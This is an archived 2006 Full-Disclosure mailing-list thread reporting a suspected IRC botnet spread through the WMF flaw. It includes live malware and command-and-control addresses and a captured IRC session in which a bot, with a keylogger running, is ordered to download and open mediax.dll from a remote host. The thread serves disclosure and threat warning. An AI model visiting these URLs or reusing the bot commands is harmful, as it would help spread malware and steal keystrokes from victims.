lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Fri Jan 20 13:58:12 2006
From: obnoxious at hush.com (obnoxious@...h.com)
Subject: Possible large botnet

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I don't necessarily think whomever was infected was infected via
viewing this site:

http://php.tjit.or.kr/ppp/log/sent.txt

Lists a slew of email addresses which whomever "could have" sent
bogus messages to possibly infect (l)users.

On Fri, 20 Jan 2006 01:35:45 -0500 Pablo Esterban
<pablo_esterban@...mail.com> wrote:
>Seems to be a botnet forming with the help of exploiting the
>recent wmf flaw
>on the following site. AFAIK malware/adware is referencing this.
>
>
>************D O  N O T  C L I C K************
>http://213.17.233.194/mediabar.wmf
>http://213.17.233.194/stat_s3.php
>http://213.17.233.194/stat.html
>************D O  N O T  C L I C K************
>
>This injects a trojan connecting to 219.240.142.59 on port 44234
>
>44234/tcp open     irc          Unreal ircd
>47292/tcp open     irc          Unreal ircd
>47296/tcp open     irc          Unreal ircd
>54729/tcp open     irc-proxy    psyBNC 2.3.1
>
>Channel stats list around 500 bots and around 1200 connected (may
>or may not
>be accurate), however if you poke around you will find
>http://219.240.142.59/usage/, containing some interesting links
>and info
>about when this most likely started.
>
>The tcp stream below demos the login, and calling of
>http://219.240.142.59/ppp/mediax.dll. Stats for January list close

>to 90k
>hits on this particular file(!).
>
>
>NICK *****
>
>USER plnaehe 0 0 :*****
>
>:irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
>
>:irc.foonet.com NOTICE AUTH :*** Found your hostname
>
>:irc.foonet.com 001 *****:Welcome to the ROXnet IRC Network *****
>
>:irc.foonet.com 002 *****:Your host is irc.foonet.com, running
>version
>Unreal3.2.3
>
>:irc.foonet.com 003 *****:This server was created Thu Oct 13 2005
>at
>17:25:57 KST
>
>:irc.foonet.com 005 *****SAFELIST HCN MAXCHANNELS=10
>CHANLIMIT=#:10
>MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307
>KICKLEN=307
>AWAYLEN=307 MAXTARGETS=20 WALLCHOPS WATCH=128 :are supported by
>this server
>
>:irc.foonet.com 005 *****SILENCE=15 MODES=12 CHANTYPES=#
>PREFIX=(ohv)@%+
>CHANMODES=beIqa,kfL,lj,psmntirRcOAQKVGCuzNSMTG NETWORK=ROXnet
>CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=@%+ EXCEPTS
>INVEX
>CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
>
>:irc.foonet.com 251 *****:There are 1 users and 1194 invisible on
>1 servers
>
>:irc.foonet.com 252 *****1 :operator(s) online
>
>:irc.foonet.com 253 *****201 :unknown connection(s)
>
>:irc.foonet.com 254 *****10 :channels formed
>
>:irc.foonet.com 255 *****:I have 1195 clients and 0 servers
>
>:irc.foonet.com 265 *****:Current Local Users: 1195  Max: 5529
>
>:irc.foonet.com 266 *****:Current Global Users: 1195  Max: 1276
>
>:irc.foonet.com 422 *****:MOTD File is missing
>
>*****MODE *****:+iwTxd
>
>USERHOST *****
>
>:irc.foonet.com 302 *****:*****
>
>MODE *****-x+B
>
>JOIN #mrbean5 rowan
>
>PRIVMSG *****:[KEYLOG]: Key logger active.
>
>USERHOST *****
>
>MODE *****-x+B
>
>JOIN #mrbean5 rowan
>
>USERHOST *****
>
>MODE *****-x+B
>
>JOIN #mrbean5 rowan
>
>:irc.foonet.com NOTICE *****:BOTMOTD File not found
>
>*****MODE *****:-x+B
>
>***** JOIN :#mrbean5
>
>:irc.foonet.com 332 *****#mrbean5 :.wipe
>http://219.240.142.59/ppp/mediax.dll mediax.dll 3
>
>:irc.foonet.com 333 *****#mrbean5 DDDI 1137401387
>
>:irc.foonet.com 353 *****@ #mrbean5 *****
>
>:irc.foonet.com 366 *****#mrbean5 :End of /NAMES list.
>
>*****PRIVMSG *****:[KEYLOG]: Key logger active.
>
>:irc.foonet.com 302 *****
>
>:irc.foonet.com 302 *****
>
>PRIVMSG #mrbean5 :[DOWNLOAD]: Downloading URL:
>http://219.240.142.59/ppp/mediax.dll to: mediax.dll.
>
>:irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5)
>
>PRIVMSG #mrbean5 :[DOWNLOAD]: Downloaded 214.5 KB to
>C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll @ 71.5 KB/sec.
>
>PRIVMSG #mrbean5 :[DOWNLOAD]: Opened:
>C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll.
>
>:irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5)
>
>:irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5)
>
>_________________________________________________________________
>Don't just search. Find. Check out the new MSN Search!
>http://search.msn.click-url.com/go/onm00200636ave/direct/01/
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkPQ7FsACgkQo8cxM8/cskpeWgCfYV8lOqt4qAqGHbXl3/YPjsjE26oA
oIe+zN0P1qsDz+gfy4da+vfZ+A3y
=suSR
-----END PGP SIGNATURE-----




Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

Powered by blists - more mailing lists